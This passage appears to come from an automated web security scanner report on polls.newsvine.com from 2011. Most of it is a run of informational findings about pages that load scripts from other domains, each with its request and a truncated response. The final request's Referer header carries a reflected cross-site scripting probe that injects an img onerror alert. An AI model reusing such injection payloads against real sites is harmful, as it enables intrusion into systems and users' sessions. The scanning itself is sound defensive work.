Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.543. http://www.polls.newsvine.com/_nv/cms/backyard/tools

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/backyard/tools

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/backyard/tools HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:58 GMT
Content-Length: 20666
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.544. http://www.polls.newsvine.com/_nv/cms/help/faq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/help/faq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/help/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:41 GMT
Content-Length: 19412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.545. http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/codeOfHonor

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/codeOfHonor HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:48 GMT
Content-Length: 22633
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.546. http://www.polls.newsvine.com/_nv/cms/info/companyInfo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/companyInfo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/companyInfo HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 19220
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.547. http://www.polls.newsvine.com/_nv/cms/info/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/contact

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/contact HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:43 GMT
Content-Length: 20175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.548. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/copyrightPolicy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:55 GMT
Content-Length: 21217
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.549. http://www.polls.newsvine.com/_nv/cms/info/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/jobs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/jobs HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 22585
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.550. http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/privacyPolicy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/privacyPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:53 GMT
Content-Length: 32656
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.551. http://www.polls.newsvine.com/_nv/cms/info/userAgreement

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/info/userAgreement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/info/userAgreement HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=newsvine&amp;width=160&amp;format=standard&amp;numresults=4&amp;linkcolor=993733&amp;titlecolor=993733&amp;title=1&amp;textcolor=666666"></script>
...[SNIP]...

23.552. http://www.polls.newsvine.com/_nv/cms/welcome

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_nv/cms/welcome

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/cms/welcome HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:32 GMT
Content-Length: 16514
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.553. http://www.polls.newsvine.com/_vine/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_vine/a HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee%3Cimg%20src%3da%20onerror%3dalert(1)%3E16f5f70bd5e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:36:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
